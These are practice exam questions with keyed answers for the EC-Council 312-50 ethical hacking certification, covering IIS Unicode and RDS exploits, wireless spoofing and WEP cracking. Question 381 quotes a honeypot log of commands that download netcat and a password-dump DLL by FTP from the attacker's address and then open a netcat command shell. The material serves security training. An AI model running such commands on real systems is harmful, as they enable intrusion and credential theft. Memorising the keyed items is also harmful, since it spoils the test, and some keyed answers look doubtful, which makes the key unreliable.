EC-COUNCIL EC-COUNCIL Certifications 312-50 Questions & Answers

• Question 381:

  The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

  He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below:

  "cmd1.exe /c open 213.116.251.162 >ftpcom"

  "cmd1.exe /c echo johna2k >>ftpcom"

  "cmd1.exe /c echo haxedj00 >>ftpcom"

  "cmd1.exe /c echo get nc.exe >>ftpcom"

  "cmd1.exe /c echo get samdump.dll >>ftpcom"

  "cmd1.exe /c echo quit >>ftpcom"

  "cmd1.exe /c ftp s:ftpcom"

  "cmd1.exe /c nc l p 6969 e-cmd1.exe"

  What can you infer from the exploit given?

  A. It is a local exploit where the attacker logs in using username johna2k.

  B. There are two attackers on the system johna2k and haxedj00.

  C. The attack is a remote exploit and the hacker downloads three files.

  D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.

  Correct Answer: C

• Question 382:

  Paul has just finished setting up his wireless network. He has enabled numerous security features such as changing the default SSID, enabling WPA encryption and enabling MAC filtering on hi wireless router. Paul notices when he uses his wireless connection, the speed is sometimes 54 Mbps and sometimes it is only 24mbps or less. Paul connects to his wireless router's management utility and notices that a machine with an unfamiliar name is connected through his wireless connection. Paul checks the router's logs and notices that the unfamiliar machine has the same MAC address as his laptop.

  What is Paul seeing here?

  A. MAC Spoofing

  B. Macof

  C. ARP Spoofing

  D. DNS Spoofing

  Correct Answer: A

  You can fool MAC filtering by spoofing your MAC address and pretending to have some other computers MAC address.

• Question 383:

  Matthew re-injects a captured wireless packet back onto the network. He does this hundreds of times within a second. The packet is correctly encrypted and Matthew assumes it is an ARP request packet. The wireless host responds with a

  stream of responses, all individually encrypted with different IVs.

  What is this attack most appropriately called?

  A. Spoof Attack

  B. Replay Attack

  C. Inject Attack

  D. Rebound Attack

  Correct Answer: B

  A replay attack is a form of network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed. This is carried out either by the originator or by an adversary who intercepts the data and retransmits it.

• Question 384:

  On wireless networks, a SSID is used to identify the network. Why are SSID not considered to be a good security mechanism to protect a wireless network?

  A. The SSID is only 32 bits in length

  B. The SSID is transmitted in clear text

  C. The SSID is to identify a station not a network

  D. The SSID is the same as the MAC address for all vendors

  Correct Answer: B

  The use of SSIDs is a fairly weak form of security, because most access points broadcast the SSID, in clear text, multiple times per second within the body of each beacon frame. A hacker can easily use an 802.11 analysis tool (e.g., AirMagnet, Netstumbler, or AiroPeek) to identify the SSID.

• Question 385:

  In order to attack wireless network, you put up an access point and override the signal of the real access point. And when users send authentication data, you are able to capture it. What kind of attack is this?

  A. WEP Attack

  B. Drive by hacking

  C. Rogue Access Point Attack

  D. Unauthorized Access Point Attack

  Correct Answer: C

  A rogue access point is a wireless access point that has either been installed on a secure company network without explicit authorization from a local network management or has been created to allow a cracker to conduct a man-in-themiddle attack.

• Question 386:

  Joe Hacker is going wardriving. He is going to use PrismStumbler and wants it to go to a GPS mapping software application. What is the recommended and well- known GPS mapping package that would interface with PrismStumbler? Select the best answer.

  A. GPSDrive

  B. GPSMap

  C. WinPcap

  D. Microsoft Mappoint

  Correct Answer: A

  GPSDrive is a Linux GPS mapping package. It recommended to be used to send PrismStumbler data to so that it can be mapped. GPSMap is a generic term and not a real software package. WinPcap is a packet capture library for Windows. It is used to capture packets and deliver them to other programs for analysis. As it is for Windows, it isn't going to do what Joe Hacker is wanting to do. Microsoft Mappoint is a Windows application. PrismStumbler is a Linux application. Thus, these two are not going to work well together.

• Question 387:

  Sally is a network admin for a small company. She was asked to install wireless accesspoints in the building. In looking at the specifications for the access-points, she sees that all of them offer WEP.

  Which of these are true about WEP?

  Select the best answer.

  A. Stands for Wireless Encryption Protocol

  B. It makes a WLAN as secure as a LAN

  C. Stands for Wired Equivalent Privacy

  D. It offers end to end security

  Correct Answer: C

  WEP is intended to make a WLAN as secure as a LAN but because a WLAN is not constrained by wired, this makes access much easier. Also, WEP has flaws that make it less secure than was once thought.WEP does not offer end-to-end security. It only attempts to protect the wireless portion of the network.

• Question 388:

  Study the snort rule given below and interpret the rule.

  alert tcp any any --> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msg: "mountd access";)

  A. An alert is generated when a TCP packet is originated from port 111 of any IP address to the 192.168.1.0 subnet

  B. An alert is generated when any packet other than a TCP packet is seen on the network and destined for the 192.168.1.0 subnet

  C. An alert is generated when a TCP packet is generated from any IP on the 192.168.1.0 subnet and destined to any IP on port 111

  D. An alert is generated when a TCP packet originating from any IP address is seen on the network and destined for any IP address on the 192.168.1.0 subnet on port 111

  Correct Answer: D

  Refer to the online documentation on creating Snort rules at http://snort.org/docs/snort_htmanuals/htmanual_261/node147.html

• Question 389:

  Why do you need to capture five to ten million packets in order to crack WEP with AirSnort?

  A. All IVs are vulnerable to attack

  B. Air Snort uses a cache of packets

  C. Air Snort implements the FMS attack and only encrypted packets are counted

  D. A majority of weak IVs transmitted by access points and wireless cards are not filtered by contemporary wireless manufacturers

  Correct Answer: C

  Since the summer of 2001, WEP cracking has been a trivial but time consuming process. A few tools, AirSnort perhaps the most famous, that implement the Fluhrer-Mantin-Shamir (FMS) attack were released to the security community -- who until then were aware of the problems with WEP but did not have practical penetration testing tools. Although simple to use, these tools require a very large number of packets to be gathered before being able to crack a WEP key. The AirSnort web site estimates the total number of packets at five to ten million, but the number actually required may be higher than you think.

• Question 390:

  Derek has stumbled upon a wireless network and wants to assess its security. However, he does not find enough traffic for a good capture. He intends to use AirSnort on the captured traffic to crack the WEP key and does not know the IP address range or the AP. How can he generate traffic on the network so that he can capture enough packets to crack the WEP key?

  A. Use any ARP requests found in the capture

  B. Derek can use a session replay on the packets captured

  C. Derek can use KisMAC as it needs two USB devices to generate traffic

  D. Use Ettercap to discover the gateway and ICMP ping flood tool to generate traffic

  Correct Answer: D

  By forcing the network to answer to a lot of ICMP messages you can gather enough packets to crack the WEP key.